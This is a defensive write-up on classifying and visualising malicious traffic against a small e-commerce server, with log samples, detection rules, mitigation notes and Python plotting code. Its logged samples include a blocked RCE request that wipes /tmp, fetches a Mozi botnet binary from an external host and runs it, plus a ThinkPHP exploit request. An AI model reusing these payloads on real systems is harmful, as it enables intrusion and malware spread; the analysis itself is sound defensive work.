Figure 1. Heatmap showing the spectrum of attempted malicious activity targeting one of my servers in the first month of operation.

Server Security Overview

- Andrey Znamensky, 2021


Abstract

Secure systems for storing sensitive user information are vital to sustaining e-commerce platforms. Properly classifying the risk of malicious activity provides the insight needed to allocate resources to precautionary and remedial countermeasures. The methods described here elucidate the behavior of malicious agents, classify each by risk category, quantify risk level, and visualize potential server weaknesses. Based on these results, an e-commerce business can adjust server filters by threat type, location, and severity to better identify suspicious (high-risk) customer activity without affecting legitimate user experience (UX) and transactions, minimizing both vulnerability and lost profit.

Technology Summary

1. Risk categories were classified by parsing LAMP server logs in Python
2. Visualization was generated using:
- Basemap toolkit in Python
- Geographic mappings via ipinfo database

Background

Risk Level = 5
• Vulnerability scanners. The highest-risk category, vulnerability scanners seek to exploit known or “zero-day” vulnerabilities in commonly used technologies. They scrape the web for e-commerce sites that use specific technologies: in my case, Apache, phpMyAdmin, and open-source e-commerce platforms such as Magento and Saleor. They attempt either to log in to these platforms or to execute malicious commands (e.g. via SQL injection) to extract user data from unpatched platforms. This activity is indicated with a red star on the visualization.

Examples:
> PHP Vulnerability Scanner
    IP - - [DATE +0000] "GET /TP/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /TP/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /TP/html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /elrekt.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    ... 
> phpMyAdmin Vulnerability Scanner (ZmEu)

    IP - - [DATE +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /pma/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    ...
> Injection Attack (RCE attempt)
    IP - - [DATE +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://ExternalIP:port/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 0 "-" "Hello, world"
> PHP Morfeus * Scanner (soapCaller.bs)
    IP - - [DATE +0000] "GET /user/soapCaller.bs – 403 0 <IP> "-" "Morfeus+F<Redacted>+Scanner"
> ThinkPHP vulnerability exploit attempt
    IP - - [DATE +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 403 3554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    
Risk Level = 4
• Port Scanners / brute force. These connections carry a higher risk score because they actively seek access to the website databases, which could result in leakage of user data and severe disruption of business operation. They add load to server hardware as they traverse common password lists attempting to log in on port 22 (SSH), or scan for unsecured ports and directories. However, with strong passwords, SSH keys, IP blocks on SSH login, and rate limiters, these attempts are merely a nuisance on hardware load: exhaustively guessing a 13-character password containing symbols, upper- and lower-case letters, and numbers over the network would take longer than the age of the universe with current technology.
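As a rough sanity check of the brute-force estimate, the sketch below counts the search space for a 13-character password drawn from the 94 printable ASCII characters and divides it by a guess rate. The rate of 1,000 guesses per second is an assumption chosen as a generous figure for online SSH guessing, not a measured value; a rate limiter would push it far lower, while an offline attack on a stolen password hash could be many orders of magnitude faster.

```python
# Rough estimate of exhaustive-search time for a random 13-character password.
# GUESSES_PER_SECOND is an assumed value, not a measurement.
ALPHABET_SIZE = 94               # printable ASCII characters, excluding space
PASSWORD_LENGTH = 13
GUESSES_PER_SECOND = 1_000       # assumed (generous) online guess rate
SECONDS_PER_YEAR = 365.25 * 24 * 3600
AGE_OF_UNIVERSE_YEARS = 1.38e10  # approximate


def years_to_exhaust(alphabet_size, length, guesses_per_second):
    """Years needed to try every password of the given length."""
    search_space = alphabet_size ** length
    return search_space / guesses_per_second / SECONDS_PER_YEAR


years = years_to_exhaust(ALPHABET_SIZE, PASSWORD_LENGTH, GUESSES_PER_SECOND)
ratio = years / AGE_OF_UNIVERSE_YEARS
print(f"{years:.2e} years, about {ratio:.0e} times the age of the universe")
```

Under these assumptions the full search takes on the order of 10^15 years, so the conclusion holds with a wide margin for online guessing.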

Examples:
> Brute force dictionary attempt
    DATE AppacheHTTPServer sshd[PORT]: Disconnecting invalid user scan IP port ...: Change of username or service not allowed: (scan,ssh-connection) -> (service,ssh-connection) [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user service from IP port ...
    DATE AppacheHTTPServer sshd[PORT]: Received disconnect from IP port ...:  [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Disconnected from authenticating user root ... port ... [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user service from ... port ...
    DATE AppacheHTTPServer sshd[PORT]: Invalid user shop from ... port ...
    DATE AppacheHTTPServer sshd[PORT]: Disconnecting invalid user shop ... port ...: Change of username or service not allowed: (shop,ssh-connection) -> (sshd,ssh-connection) [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user steam from ... port ...
    ...
> Port Scanner
    IP - - [DATE +0000] "GET / HTTP/1.0" 403 0 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> Leakix Scanner
    IP - - [DATE +0000] "CONNECT leakix.net:443 HTTP/1.1" 403 0 "-" "Go-http-client/1.1"
Risk Level = 3
• DOS Attack. A nuisance on a larger scale: one of my servers sustained a single DOS packet flood of 20,000 requests/minute. Since the attack came from a single IP in Gravelines, FR, we characterize it as a DOS and not a DDOS (distributed). The IP is indicated with a lime green crosshair on the visualization. At this scale, the attack was merely vandalism; larger sites have sustained DDOS attacks on the order of >10^7 req/s. While I could not identify the motivation to DOS a small e-commerce site, DDOS attacks on e-commerce sites are sometimes untargeted attempts to extort payment for resuming service.

Risk Level = 2
• Proxy Scanners. Scanning for, and attempting to use, my servers as proxy servers is mostly a nuisance: the added hardware load amounts to a negligible increase in electricity consumption or server hosting fees. However, given that 100% of these requests originate from outside the USA, apparently to access blocked media or circumvent restrictions, this activity presents a legal liability risk if the user accesses a site that is blacklisted in the USA. These requests are indicated in the visualization as lime green triangles.

Examples:
> Proxy attempt (probably mail spam)
    IP - - [DATE +0000] "CONNECT account.atresmedia.com:25 HTTP/1.1" 405 0 "-" "Java/1.8.0_271"
• Tor Traffic. While Tor traffic was not causally linked to fraudulent intent in my logs, it is widely reported to correlate with illegitimate traffic. Legitimate shoppers are very unlikely to be using Tor. Furthermore, the JS-reliant elements of the site are nonfunctional in Tor Browser at its stricter security settings, which disable JavaScript, so those Tor users are unable to complete a transaction. Therefore, blocking Tor traffic represents a negligible loss of potential revenue.

Risk Level = 1

• Non-HTTP/S traffic / invalid URI. This sort of traffic manifests when there is no HTTP request method. Data arrives in garbled form, most frequently octal/hex, e.g. (…/xHH/…), where HH is a hexadecimal representation. The user agent is always undefined. It could be an attempt at buffer overflow, but is most likely innocuous.
• VPN Traffic (white-listed): Known whitelisted VPNs are given an extended captcha test, but do not inherently pose a serious security risk.
• Good Bots / crawlers: e.g. GoogleBot. While good bots generally present favorable opportunities for website SEO, GoogleBot et al. can spike server and bandwidth load while crawling sites that host large quantities of public data (e.g. videos).

Risk Level = 0
• Legitimate traffic. Legitimate addresses which access the site, make transactions, or bounce. Does NOT include visitors on:
- known VPNs / proxies
- known IP blacklists
- Tor users
- known bots (good or bad)
- port scanning activity
- flooding activity
- proxy-scanning activity


Classification

Categorization. From the server logs, malicious agents can be categorized into one of the following categories.

Risk Level | Category                             | Behavior / Examples
5          | Vulnerability scanners               | Scanning for unpatched versions of functions, trying to access env vars, SQL injection attempts
4          | Brute-force logins                   | Dictionary attack on port 22, or 80/443
3          | DOS agent                            | TCP packet flood
2          | Proxy scanner; Tor traffic           | Port scanners; Tor user agent / known nodes
1          | Unknown / Neutral                    | Non-HTTP/S, noise; VPN traffic (white-listed); good bot (e.g. GoogleBot)
0          | Legitimate traffic (everything else) | Makes transactions

Detection Methodology. The detection and extraction of these categories were automated from the server logs using the following principles:
  1. DOS: (D)DOS was identified by total contiguous requests per IP exceeding a threshold of 1000 req/min. A histogram was constructed with a 60 s interval and the request count per IP was determined for each interval. Only one instance of DOS activity was identified.
  2. Proxy Scanner: Attempts to use the server as a proxy were identified by parsing unauthorized CONNECT requests, in addition to requests containing external URLs that did not originate from good (whitelisted) bots.
  3. Vulnerability scanner: Vulnerability scanners were identified by a combination of automated and manual detection. Automated detection included: (1) name matches for blacklisted user agents, and (2) GET requests for directories not in the public list.
  4. Dictionary attacks: Dictionary attacks were identified as any login attempts via SSH or to database modules originating from an external IP that included at least one attempt containing a dictionary word.
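
The automated part of these rules can be sketched with the standard library alone. The snippet below is a minimal illustration, not the parser actually used for this project: it assumes the Apache "combined" log format, uses the 1000 req/min threshold from rule 1, and borrows a two-entry user-agent blacklist from the log samples above. The function names, the blacklist contents, and the sample lines (documentation-range IPs and made-up timestamps) are all assumptions for demonstration.

```python
import re
from collections import Counter
from datetime import datetime

# Apache "combined" format: ip, identity, user, [time], "request", status, size, "referer", "agent"
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

DOS_THRESHOLD = 1000             # requests per IP per 60 s bin (rule 1)
BAD_AGENTS = ("zmeu", "morfeus")  # illustrative blacklist (rule 3), lower-case


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    match = LOG_PATTERN.match(line)
    if match is None:
        return None
    fields = match.groupdict()
    fields["time"] = datetime.strptime(fields["time"], "%d/%b/%Y:%H:%M:%S %z")
    return fields


def classify(lines):
    """Map each flagged IP to the set of threat types detected for it."""
    per_minute = Counter()
    threats = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        ip = entry["ip"]
        # 60 s histogram bin: truncate the timestamp to the minute
        minute = entry["time"].replace(second=0, microsecond=0)
        per_minute[(ip, minute)] += 1
        if entry["request"].startswith("CONNECT "):
            threats.setdefault(ip, set()).add("proxy_scanner")
        if any(name in entry["agent"].lower() for name in BAD_AGENTS):
            threats.setdefault(ip, set()).add("vulnerability_scanner")
    for (ip, _minute), count in per_minute.items():
        if count > DOS_THRESHOLD:
            threats.setdefault(ip, set()).add("dos")
    return threats


# Placeholder log lines for demonstration only
sample = [
    '198.51.100.7 - - [13/Mar/2021:23:36:26 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"',
    '203.0.113.9 - - [13/Mar/2021:23:36:27 +0000] "CONNECT account.atresmedia.com:25 HTTP/1.1" 405 0 "-" "Java/1.8.0_271"',
]
flagged = classify(sample)
print(flagged)
```

The sketch skips the whitelist of good bots, the public-directory check, and the SSH log rules, which depend on site-specific lists not reproduced here.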

Visualization

Heatmap generation process for Fig. 1
1. The detection above produced a CSV dataset with headers: [time, IP, threatType].
2. IP was expanded to [longitude, latitude, country] with the ipinfo API
3. Data is plotted onto a Mercator projection in Basemap
4. Cross sections of the map are partitioned
5. Histogram data is generated for each cross section
6. The corresponding density is mapped to a color dictionary (gradient) with LinearSegmentedColormap
7. The heatmap colormesh is drawn with Gouraud polygonal shading
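
Steps 4 and 5 amount to a two-dimensional histogram over latitude and longitude. The sketch below shows the idea with the standard library only, as a stand-in for a NumPy 2D histogram; the grid size (90 x 45 cells of 4 degrees each) and the function names are assumptions, and the second sample point is invented to show two hits landing in the same cell.

```python
from collections import Counter


def bin_index(value, low, high, n_bins):
    """Index of the equal-width bin containing value; the top edge falls in the last bin."""
    if not low <= value <= high:
        raise ValueError(f"{value} is outside [{low}, {high}]")
    width = (high - low) / n_bins
    return min(int((value - low) / width), n_bins - 1)


def density_grid(points, n_lon=90, n_lat=45):
    """Count (lat, lon) points per grid cell, keyed by (lat_bin, lon_bin)."""
    counts = Counter()
    for lat, lon in points:
        cell = (bin_index(lat, -90, 90, n_lat), bin_index(lon, -180, 180, n_lon))
        counts[cell] += 1
    return counts


points = [
    (50.9865, 2.1281),     # Gravelines, FR
    (50.9, 2.2),           # invented nearby point
    (37.3483, -121.9844),  # one of the vulnerability-scanner locations
]
grid = density_grid(points)
for cell, count in sorted(grid.items()):
    print(cell, count)
```

Each cell count then plays the role of the density value that step 6 maps onto the color gradient.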


Remediation

The advantages and disadvantages of remedying these security risks with server-side versus third-party systems are described below.

1. Server-side open source: e.g. fail2ban
2. Third party: e.g. CloudFlare

Initially, fail2ban was used to protect against brute-force attacks and DDOS by configuring custom rules for the jail time of malicious IPs. The policies manifest as packet filter rule chains in the Linux kernel firewall (iptables). Fail2ban and the server firewall consumed an average of 10% latent CPU parsing long lists of blacklisted IPs. Additionally, it was desirable to filter out entirely the IPs from countries with a fraud score above 90%, as the risks greatly outweighed their legitimate business. I initially used the MaxMind GeoIP database for this purpose, but did not have sufficient infrastructure to handle the combined load of the additional processing.

The primary motivations for adding a third party were:
(1) load distribution
(2) automated captcha pages

DDOS attacks vary in nature by request frequency and bandwidth consumption.

Before CloudFlare
- REQUEST LIMITATION: Without a third party, fail2ban would place any IP exceeding 10 req / second in a 60 min jail. This limit may have to be adjusted depending on the type of e-commerce site and the statistics observed in QA testing. For example, if testing shows that customers average 5 req / second with a standard deviation of 1 req / second, it may be appropriate to set the limiter 3 sigma above the mean. In this case, an 8 req / second limit would throttle only about 0.13% of the customer population, assuming normally distributed request rates.
- BANDWIDTH LIMITATION: Additionally, any IP consuming over 60 Mb/min would be placed in a 60 min jail.
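
The 3-sigma example can be checked numerically. The sketch below assumes request rates are normally distributed (an assumption; real traffic is often skewed) and computes the limit and the share of customers above it. Because the limiter only cuts the upper tail, the relevant figure is the one-sided tail, about 0.13%; the two-sided 3-sigma figure would be about 0.27%.

```python
import math


def upper_tail(z):
    """P(Z > z) for a standard normal variable."""
    return 0.5 * math.erfc(z / math.sqrt(2))


MEAN_REQ_PER_S = 5.0  # example mean from the text
STD_REQ_PER_S = 1.0   # example standard deviation from the text
SIGMA_LEVEL = 3

limit = MEAN_REQ_PER_S + SIGMA_LEVEL * STD_REQ_PER_S
throttled_fraction = upper_tail(SIGMA_LEVEL)
print(f"limit = {limit:g} req/s, throttled share = {throttled_fraction:.2%}")
```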

Assuming the max bandwidth consumption per req, the malicious IP would become bandwidth-limited before being rate (req)-limited. Assuming a bandwidth cap of 1 Mb/s per IP (60 Mb/min) and server costs of $0.01/Gb, a single IP can cause at most $0.00001/s of cost, or approximately $0.036/hr. This quickly adds up with a distributed attack. As with request limits, the caps can be adjusted based on historical statistics.
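
The bandwidth arithmetic can be written out as follows. This is a back-of-the-envelope sketch using the cap and price quoted above; it assumes decimal units (1 Gb = 1000 Mb) and that every attacking IP saturates its cap for the whole hour, and the function name is illustrative.

```python
BANDWIDTH_CAP_MBIT_PER_S = 1.0  # per-IP cap from the text (60 Mb/min)
COST_PER_GBIT_USD = 0.01        # server cost from the text
MBIT_PER_GBIT = 1000            # assumes decimal (SI) units


def hourly_cost(n_ips):
    """Worst-case bandwidth cost per hour for n_ips clients saturating the cap."""
    cost_per_second = BANDWIDTH_CAP_MBIT_PER_S / MBIT_PER_GBIT * COST_PER_GBIT_USD
    return n_ips * cost_per_second * 3600


for n in (1, 1_000, 1_000_000):
    print(f"{n:>9,} IPs: ${hourly_cost(n):,.2f}/hr")
```

A single IP costs under four cents per hour, but the figure scales linearly with the number of attacking IPs.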

After CloudFlare
- With a cost of $0.05 per 10,000 req and a req rate limiter (1 hr time-outs), an attack from 1,000,000 unique IPs at 10 req/s would be limited to $50/hr of damage. An attack orchestrated just below the per-IP cap would, upon exceeding an aggregate threshold, auto-upgrade the defense level to display captcha tests to all users.
- The third party carries the additional advantage of eliminating the 10% latent CPU load by processing all blacklists externally, which provides a more scalable solution for a growing business.
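
The $50/hr figure can be reproduced under one reading of the rate limiter: each IP gets roughly one second of traffic (10 requests) through before it is timed out for an hour. That blocking model is an assumption made for this sketch, as are the function and variable names; the price per request is the one quoted above.

```python
COST_PER_REQUEST_USD = 0.05 / 10_000  # pricing figure from the text
TIMEOUT_HOURS = 1                     # rate-limiter time-out from the text


def hourly_damage(n_ips, requests_before_block):
    """Billable cost per hour if every IP is blocked for TIMEOUT_HOURS after
    sending requests_before_block requests (an assumed blocking model)."""
    requests_per_hour = n_ips * requests_before_block / TIMEOUT_HOURS
    return requests_per_hour * COST_PER_REQUEST_USD


damage = hourly_damage(n_ips=1_000_000, requests_before_block=10)

# For comparison: the same attack with no rate limiter at all
unthrottled = 1_000_000 * 10 * 3600 * COST_PER_REQUEST_USD

print(f"rate limited: ${damage:,.2f}/hr, unthrottled: ${unthrottled:,.2f}/hr")
```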

The diagram below shows my setup, which has resulted in 0% observed incidence of events with risk levels 2-5. This indicates that the former attacks were most likely not targeted on the basis of keywords associated with my sites or products, but rather a result of bots scanning IP ranges. CloudFlare block logs indicate a similar distribution of absorbed attacks in terms of type and country of origin.
[Diagram: server setup]

Opportunities for Improvement

Overlapping activity types. Our server logs indicated that categories 4-5 were entirely separate and automated. In other words, a visitor who scanned for vulnerabilities in a particular technology did not attempt to brute-force any logins, and vice versa. Extending the visualization to capture visitors who simultaneously engage in multiple categories of nefarious activity would make a balanced risk score computation challenging.
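
One simple way to handle an IP that shows up in several categories is to keep every category seen and score the IP by its highest risk level. The sketch below illustrates only that rule; it is not the scoring used for Fig. 1, it makes no attempt at a balanced or weighted score, and the category keys and sample events are hypothetical.

```python
# Risk levels follow the categorization table; the key names are illustrative
RISK_LEVEL = {
    "vulnerability_scanner": 5,
    "brute_force": 4,
    "dos": 3,
    "proxy_scanner": 2,
    "tor": 2,
    "unknown": 1,
    "legitimate": 0,
}


def score_by_ip(events):
    """events: iterable of (ip, threat_type). Returns {ip: (max_level, sorted types)}."""
    types_by_ip = {}
    for ip, threat_type in events:
        types_by_ip.setdefault(ip, set()).add(threat_type)
    return {
        ip: (max(RISK_LEVEL[t] for t in types), sorted(types))
        for ip, types in types_by_ip.items()
    }


# Hypothetical events using documentation-range IPs
events = [
    ("198.51.100.7", "vulnerability_scanner"),
    ("198.51.100.7", "brute_force"),
    ("203.0.113.9", "proxy_scanner"),
]
scores = score_by_ip(events)
print(scores)
```

Taking the maximum keeps the score on the existing 0-5 scale, at the cost of treating an IP with one category the same as an IP with several.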

Low resolution. Density mapping in Basemap, even with the resolution parameter set to ‘h’ (high), relies on Gouraud shading of polygon meshes mapped to the histogram of latitude and longitude bins, and the result does not look very smooth. If the user zooms in on the high resolution rendition, they will be able to see the rough outlines of the small polygons.
Future work will involve a gmaps/gmplot zoomable implementation, with post-processing to generate overlay marker types, and overlay of country .shp (shape) polygons to shade countries by risk score.

Outlier detection. X-Forwarded-For IP headers are currently being properly resolved from CloudFlare to origin IPs. A potential opportunity for improvement would be to collect and merge additional data (e.g. mouse cursor time series data, cookie data) to improve quantification of risk score for categories 0-2.
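
For reference, resolving X-Forwarded-For safely usually means trusting the header only when the connection comes from a known proxy, and reading it from the right, since each proxy appends the address it saw and anything further left can be forged by the client. The sketch below shows that rule with the standard library; the trusted range is a documentation-only placeholder (in practice it would be the proxy provider's published ranges) and the function names are illustrative, not part of this project's code.

```python
import ipaddress

# Hypothetical trusted-proxy range (documentation addresses, RFC 5737)
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.0/24")]


def is_trusted(ip_text):
    """True if the address belongs to a trusted proxy; raises ValueError if malformed."""
    address = ipaddress.ip_address(ip_text)
    return any(address in network for network in TRUSTED_PROXIES)


def client_ip(peer_ip, x_forwarded_for=""):
    """Return the address a request should be attributed to."""
    if not is_trusted(peer_ip):
        return peer_ip  # direct connection: the header could be forged, so ignore it
    hops = [hop.strip() for hop in x_forwarded_for.split(",") if hop.strip()]
    # Walk from the right: the first untrusted hop is what the proxy chain saw
    for hop in reversed(hops):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            break  # malformed entry: stop and fall back to the peer address
    return peer_ip


print(client_ip("203.0.113.5", "10.1.1.1, 198.51.100.7"))
```

Here the leftmost entry (10.1.1.1) is ignored because only the rightmost untrusted hop was recorded by the trusted proxy itself.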

Source


"""
Created on Sat Mar 13 23:36:26 2021
@author: Znamensky 2021
heatmap.py - builds heatmap from weight-adjusted data using basemap and matplotlib libs
"""
# -*- coding: utf-8 -*-

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors
from mpl_toolkits.basemap import Basemap
import pandas
from matplotlib.colors import LinearSegmentedColormap

import ipinfo

def getGeo(ip):
    """
    Retrieves geographic location given an IP using ipinfo database.
    Data includes country, city, longitude, and latitude in the returned details.
    This function is included for demonstration purposes, and is intended
    to be executed within a loop to process large IP datasets.
    """
    access_token = '<YOURTOKEN>'
    handler = ipinfo.getHandler(access_token)
    details = handler.getDetails(ip)  # look up the IP passed in by the caller
    # details.city, details.country and details.loc ("lat,lon") hold the location
    return details

#EXTRACT DATA FROM CSV (the first row is treated as a header and skipped)
colnames = ['lat','lon']
data = pandas.read_csv('data.csv', names=colnames, header=0)
a_list = data.lat.astype(float).tolist() #lats
b_list = data.lon.astype(float).tolist() #lons

#BASEMAP INITIALIZATION (merc projection, (l)ow quality res)
m = Basemap(projection='merc', llcrnrlat=-82, urcrnrlat=82,
            llcrnrlon=-180, urcrnrlon=180, resolution='l')

#CREATE HISTOGRAM
nx = 90
ny = nx//2
lon_bins = np.linspace(-180, 180, nx)
lat_bins = np.linspace(-90, 90, ny)

density, lat_edges, lon_edges = np.histogram2d(a_list, b_list, [lat_bins, lon_bins])
lon_bins_2d, lat_bins_2d = np.meshgrid(lon_bins, lat_bins)

xs, ys = m(lon_bins_2d, lat_bins_2d)

# GRADIENT (WHITE -> YELLOW -> ORANGE -> RED)
# Each row is (x, value just below x, value just above x)
cdict = {'red':   ((0.0, 1.0, 1.0),
                   (0.5, 1.0, 1.0),
                   (0.5, 0.64, 1.0),
                   (1.0, 0.8, 0.8)),

         'green': ((0.0, 1.0, 1.0),
                   (0.5, 1.0, 1.0),
                   (0.5, 0.64, 1.0),
                   (1.0, 0.0, 0.0)),

         'blue':  ((0.0, 1.0, 1.0),
                   (0.5, 0.0, 1.0),
                   (0.5, 0.64, 0.0),
                   (1.0, 0.0, 0.0))
         }

# LINEAR SEGMENTED COLORMAP
custom_map = LinearSegmentedColormap('custom_map', cdict)

# Pad density with a zero column and row so its shape matches the
# bin-edge grids (xs, ys), as Gouraud shading requires
density = np.hstack((density,np.zeros((density.shape[0],1))))
density = np.vstack((density,np.zeros((density.shape[1]))))


# PLOT GOURAUD HEAT MAP
# The colormap object is passed directly, so no registration by name is needed
plt.pcolormesh(xs, ys, density, cmap=custom_map, shading='gouraud')

# COLORBAR
cbar = plt.colorbar(orientation='horizontal', shrink=0.625, aspect=20)
cbar.set_label('Risk Score',size=18)

# DRAW COUNTRIES AND COASTLINES
m.drawcountries(linewidth=0.3, linestyle='solid', color= 'black')
m.drawcoastlines(linewidth=0.3, linestyle='solid', color= 'black')

#heatmap data
x,y = m(b_list, a_list)

#DOS
xi,yi = m(2.1281,50.9865)
m.plot(xi,yi,'+', markersize = 50.0, zorder = 20, markerfacecolor='#00FF1F', markeredgecolor="#00FF1F", alpha = 1.0 )

#GFW (lime green triangles)
gfw_lat = [32.0617,39.9075,31.3041,30.2936,23.1167,30.6667,31.2222,34.1213,29.5603,32.0422,34.2044,22.5455,38.0414,40.919,28.1987,24.4798]
gfw_lon = [118.7778,116.3972,120.5954,120.1614,113.25,104.0667,121.4581,118.7808,106.5577,112.1448,117.2839,114.0683,114.4786,110.3831,112.9709,118.0819]
for lat, lon in zip(gfw_lat, gfw_lon):
    xi,yi = m(lon, lat)  # Basemap expects (lon, lat)
    m.plot(xi,yi,'^', markersize = 6.0, zorder = 10, markerfacecolor='#00FF1F'  )

#VULNERABILITY (red stars)
vuln_lat = [37.3483,30.2936,30.6667,39.9075,32.0617,31.2222,34.1213,40.8043,52.374,13.2257,10.369]
vuln_lon = [-121.9844,120.1614,104.0667,116.3972,118.7778,121.4581,118.7808,-74.0121,4.8897,77.575,77.9804]
for lat, lon in zip(vuln_lat, vuln_lon):
    xi,yi = m(lon, lat)  # Basemap expects (lon, lat)
    m.plot(xi,yi,'*', markersize = 12.0, zorder = 10, markerfacecolor='#FF0000'  )

# ENLARGE and SHOW
plt.gcf().set_size_inches(20,20)
plt.show()